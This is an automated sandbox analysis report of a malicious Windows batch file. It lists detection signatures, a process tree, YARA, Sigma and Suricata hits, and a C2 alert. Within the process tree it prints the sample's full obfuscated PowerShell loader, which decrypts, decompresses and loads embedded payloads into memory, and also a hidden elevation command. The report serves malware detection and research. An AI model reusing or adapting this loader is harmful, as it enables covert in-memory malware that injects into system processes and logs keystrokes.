Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
skf7iF4.bat

Overview

General Information

Sample name:skf7iF4.bat
Analysis ID:1631966
MD5:7b05eb7fc87326bd6bb95aca0089150d
SHA1:cbb811467a778fa329687a1afd2243fdc2c78e5a
SHA256:c0b082bae70e899007157ffc0267d41b7d80d6c42ee6f71a8c052cd9517cb845
Tags:batuser-aachum
Infos:

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell decrypt and execute
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Found large BAT file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Suspicious powershell command line found
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6300 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skf7iF4.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6440 cmdline: powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\skf7iF4.bat' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 3568 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\Desktop\skf7iF4.bat" sgcCUaUFtA MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6304 cmdline: powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • findstr.exe (PID: 6548 cmdline: "C:\Windows\system32\findstr.exe" /i WDS100T2B0A MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 4012 cmdline: cmd.exe /c echo function ixMY($RTJl){ Invoke-Expression -Verbose '$lYya=[kQSkQykQstkQekQm.kQSkQekQckQukQrkQikQtkQykQ.kQCrkQykQpkQtokQgrkQakQphkQykQ.kQAekQskQ]:kQ:CkQrkQekQakQtekQ(kQ);'.Replace('kQ', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$lYya.M7ko7kd7ke=7k[7kSy7ks7kt7ke7km7k.7kS7ke7kc7ku7kri7kt7ky7k.C7kry7kp7kto7kg7kr7kap7kh7ky.7kCi7kp7kh7ke7krM7ko7kd7ke]7k:7k:C7kB7kC;'.Replace('7k', ''); Invoke-Expression -InformationAction Ignore '$lYya.PUPaUPdUPdiUPnUPg=UP[UPSUPyUPsUPtUPeUPmUP.UPSUPecUPuUPrUPitUPy.UPCUPryUPpUPtUPogUPrUPapUPhyUP.UPPUPaUPddUPiUPnUPgMUPoUPdeUP]UP::UPPUPKUPCUPS7UP;'.Replace('UP', ''); Invoke-Expression -Verbose '$lYya.KF4eF4yF4=[F4SF4ysF4tF4eF4mF4.F4CF4oF4nF4vF4eF4rtF4]F4:F4:FF4roF4mF4BaF4sF4eF464F4SF4trF4inF4g("6F4iF4nF4QTF4VF4f6F4kF4MF4fF4iF4uF49F40F4mF4wF4KaF4ZF48F4tDF482F4BF4yTF4DF4CF4HNF4RF4PsF4BFF42F4gF4fF4mFF4QF4=");'.Replace('F4', ''); Invoke-Expression -Debug -Verbose -InformationAction Ignore -WarningAction Inquire '$lYya.IcuVcu=cu[Scuycustcuecumcu.cuCcuocuncuvcuecurcut]cu:cu:cuFrcuomcuBcuascuecu6cu4Scutcuricungcu("OcuQcufcuEscuocuBxcu6cufcuucuHcuocuGcu2cuocu+cubrcu8curcuQ=cu=");'.Replace('cu', ''); $kxIY=$lYya.CreateDecryptor(); $uoEQ=$kxIY.TransformFinalBlock($RTJl, 0, $RTJl.Length); $kxIY.Dispose(); $lYya.Dispose(); $uoEQ;}function eaLU($RTJl){ Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction Ignore '$QqUU=NgZegZwgZ-OgZbgZjegZcgZtgZ gZSgZygZsgZtgZegZmgZ.IgZOgZ.gZMegZmogZrgZySgZtgZrgZeagZm(,$RTJl);'.Replace('gZ', ''); Invoke-Expression -WarningAction Inquire '$JLmq=NgZegZwgZ-OgZbgZjegZcgZtgZ gZSgZygZsgZtgZegZmgZ.IgZOgZ.gZMegZmogZrgZySgZtgZrgZeagZm;'.Replace('gZ', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore '$FcOM=NJVeJVwJV-OJVbJVjeJVcJVtJV JVSJVyJVsJVtJVeJVmJV.IJVOJV.JVCoJVmpJVrJVesJVsJViJVonJV.JVGZJVipJVSJVtJVrJVeaJVmJV($QqUU, [JVIJVOJV.CJVoJVmpJVrJVeJVsJVsJViJVoJVnJV.JVCJVomJVpJVrJVesJVsiJVoJVnMJVoJVdJVe]JV:JV:DJVecJVoJVmJVpJVreJVsJVs);'.Replace('JV', ''); $FcOM.CopyTo($JLmq); $FcOM.Dispose(); $QqUU.Dispose(); $JLmq.Dispose(); $JLmq.ToArray();}function asdm($RTJl,$dnWr){ Invoke-Expression -InformationAction Ignore -Verbose -Debug '$UMjh=[imSimyimstimeimm.imRimeimfimlimeimcimtimiimoimn.imAimsimseimmbimlimy]im:im:imLoimaimd([byte[]]$RTJl);'.Replace('im', ''); Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire -Debug '$mtQH=$UMjh.EIAnIAtIAryIAPIAoiIAnIAtIA;'.Replace('IA', ''); Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire -Debug '$mtQH.7yI7yn7yvo7yk7ye(7y$7yn7yu7yl7yl7y, $dnWr);'.Replace('7y', '');}function rfR($wdZq){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'YgRcXRGuMxdAM;gxWdtVB;oXRuvWNbWmgoaX'; Set-ItemProperty -Path $registryPath -Name 'YgRcXRGuMxdAM' -Value $wdZq; Set-ItemProperty -Path $registryPath -Name 'gxWdtVB' -Value '6inQTVf6kMfiu90mwKaZ8tD82ByTDCHNRPsBF2gfmFQ='; Set-ItemProperty -Path $registryPath -Name 'oXRuvWNbWmgoaX' -Value 'OQfEsoBx6fuHoG2o+br8rQ==';}$CjAH = 'C:\Users\user\Desktop\skf7iF4.bat';$host.UI.RawUI.WindowTitle = $CjAH;$Qxzd=[System.IO.File]::ReadAllText($CjAH).Split([Environment]::NewLine);foreach ($yehF in $Qxzd) { if ($yehF.StartsWith('uVcLd')) { $PNRU=$yehF.Substring(5); break; }}rfR $PNRU;$wdZq=[string[]]$PNRU.Split('\');Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire -Verbose '$GcJ = eaLU (ixMY ([14C14o14nv14e14rt14]14:14:14F14r14o14m14B14a14se14614414St14ri14n14g($wdZq[0].Replace("#", "/").Replace("@", "A"))));'.Replace('14', '');Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire -Debug '$lpG = eaLU (ixMY ([14C14o14nv14e14rt14]14:14:14F14r14o14m14B14a14se14614414St14ri14n14g($wdZq[1].Replace("#", "/").Replace("@", "A"))));'.Replace('14', '');Invoke-Expression -WarningAction Inquire -Verbose '$Yek = eaLU (ixMY ([14C14o14nv14e14rt14]14:14:14F14r14o14m14B14a14se14614414St14ri14n14g($wdZq[2].Replace("#", "/").Replace("@", "A"))));'.Replace('14', '');asdm $GcJ $null;asdm $lpG $null;asdm $Yek (,[string[]] ('sgcCUaUFtA')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 3316 cmdline: powershell.exe -WindowStyle Hidden -NoProfile MD5: 04029E121A0CFA5991749937DD22A1D9)
          • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
            • lsass.exe (PID: 632 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
              • svchost.exe (PID: 2536 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • dwm.exe (PID: 1000 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
            • svchost.exe (PID: 400 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 716 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 620 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1040 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1056 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1068 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1128 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1296 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1320 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1344 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1488 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1504 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1548 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1600 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1652 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1712 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1732 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1744 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1924 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1984 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1340 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1640 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1588 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2012 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2092 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • spoolsv.exe (PID: 2220 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)
        • more.com (PID: 6520 cmdline: more MD5: EDB3046610020EE614B5B81B0439895E)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000003.1497124336.000001B92983C000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    Process Memory Space: powershell.exe PID: 3316INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x135bbf:$b2: ::FromBase64String(
    • 0x136267:$b2: ::FromBase64String(
    • 0x1362de:$b2: ::FromBase64String(
    • 0x1371e4:$b2: ::FromBase64String(
    • 0x19179:$s1: -join
    • 0x14193b:$s1: -join
    • 0x143fb8:$s1: -join
    • 0x1e115:$s3: Reverse
    • 0x159475:$s3: Reverse
    • 0x13bde:$s4: +=
    • 0x13c80:$s4: +=
    • 0x17398:$s4: +=
    • 0x18e4e:$s4: +=
    • 0x19064:$s4: +=
    • 0x1915b:$s4: +=
    • 0x13dbd6:$s4: +=
    • 0x13dbf5:$s4: +=
    • 0x13dc30:$s4: +=
    • 0x13dc4d:$s4: +=
    • 0x13dc88:$s4: +=
    • 0x13dcf4:$s4: +=
    Process Memory Space: winlogon.exe PID: 556JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_3316.amsi.csvJoeSecurity_PowershellDecryptAndExecuteYara detected Powershell decrypt and executeJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
        Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Windows\System32\svchost.exe, QueryName: ipwho.is
        Sigma detected: Uncommon Svchost Parent Process
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: winlogon.exe, ParentImage: C:\Windows\System32\winlogon.exe, ParentProcessId: 556, ParentProcessName: winlogon.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 928, ProcessName: svchost.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\skf7iF4.bat' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs" , CommandLine: powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\skf7iF4.bat' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skf7iF4.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6300, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\skf7iF4.bat' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs" , ProcessId: 6440, ProcessName: powershell.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-07T17:52:51.040316+010020355951Domain Observed Used for C2 Detected176.65.144.144567192.168.2.649687TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Joe Sandbox ML detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
        Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.6:49690 version: TLS 1.2
        Source: Binary string: kernel32.pdbUGP source: winlogon.exe, 00000011.00000003.1497625230.000001B927CE6000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernelbase.pdbUGP source: winlogon.exe, 00000011.00000003.1497124336.000001B92983C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000001A.00000000.1542678836.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2511742250.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: d.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001A.00000000.1542678836.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2511742250.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb0A5 source: svchost.exe, 0000001A.00000000.1542678836.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2511742250.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000001A.00000000.1542678836.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2511742250.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000001A.00000000.1542678836.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2511742250.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbcache source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ntdll.pdb source: winlogon.exe, 00000011.00000003.1496794921.000001B927CC5000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernel32.pdb source: winlogon.exe, 00000011.00000003.1497625230.000001B927CE6000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ntdll.pdbUGP source: winlogon.exe, 00000011.00000003.1496794921.000001B927CC5000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001A.00000002.2510051300.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1542643733.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001A.00000002.2510051300.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1542643733.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001A.00000002.2510051300.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1542643733.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001A.00000002.2510051300.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1542643733.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernelbase.pdb source: winlogon.exe, 00000011.00000003.1497124336.000001B92983C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp
        Source: C:\Windows\System32\cmd.exeCode function: 4_2_000001B780BEF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_000001B780BEF3E8
        Source: C:\Windows\System32\cmd.exeCode function: 4_2_000001B780BEF264 FindFirstFileExW,4_2_000001B780BEF264
        Source: C:\Windows\System32\conhost.exeCode function: 5_2_000002640732F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_000002640732F3E8
        Source: C:\Windows\System32\conhost.exeCode function: 5_2_000002640732F264 FindFirstFileExW,5_2_000002640732F264
        Source: C:\Windows\System32\more.comCode function: 16_2_00000234FE52F264 FindFirstFileExW,16_2_00000234FE52F264
        Source: C:\Windows\System32\more.comCode function: 16_2_00000234FE52F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_00000234FE52F3E8
        Source: C:\Windows\System32\lsass.exeCode function: 18_2_000002158AEEF264 FindFirstFileExW,18_2_000002158AEEF264
        Source: C:\Windows\System32\lsass.exeCode function: 18_2_000002158AEEF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_000002158AEEF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001E8A01AF264 FindFirstFileExW,19_2_000001E8A01AF264
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001E8A01AF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_000001E8A01AF3E8
        Source: C:\Windows\System32\dwm.exeCode function: 20_2_000001F08894F264 FindFirstFileExW,20_2_000001F08894F264
        Source: C:\Windows\System32\dwm.exeCode function: 20_2_000001F08894F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_000001F08894F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001AC86F7F264 FindFirstFileExW,21_2_000001AC86F7F264
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001AC86F7F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_000001AC86F7F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000014785FBF264 FindFirstFileExW,22_2_0000014785FBF264
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000014785FBF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_0000014785FBF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001DC59D1F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_000001DC59D1F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001DC59D1F264 FindFirstFileExW,23_2_000001DC59D1F264
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_0000016588BCF264 FindFirstFileExW,24_2_0000016588BCF264
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_0000016588BCF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,24_2_0000016588BCF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000017A8D34F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,25_2_0000017A8D34F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000017A8D34F264 FindFirstFileExW,25_2_0000017A8D34F264
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001F34D8BF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_000001F34D8BF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_000001F34D8BF264 FindFirstFileExW,26_2_000001F34D8BF264
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_00000220C270F264 FindFirstFileExW,27_2_00000220C270F264
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_00000220C270F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,27_2_00000220C270F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 28_2_0000025AF1E9F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,28_2_0000025AF1E9F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 28_2_0000025AF1E9F264 FindFirstFileExW,28_2_0000025AF1E9F264
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_0000027BFFD3F264 FindFirstFileExW,29_2_0000027BFFD3F264
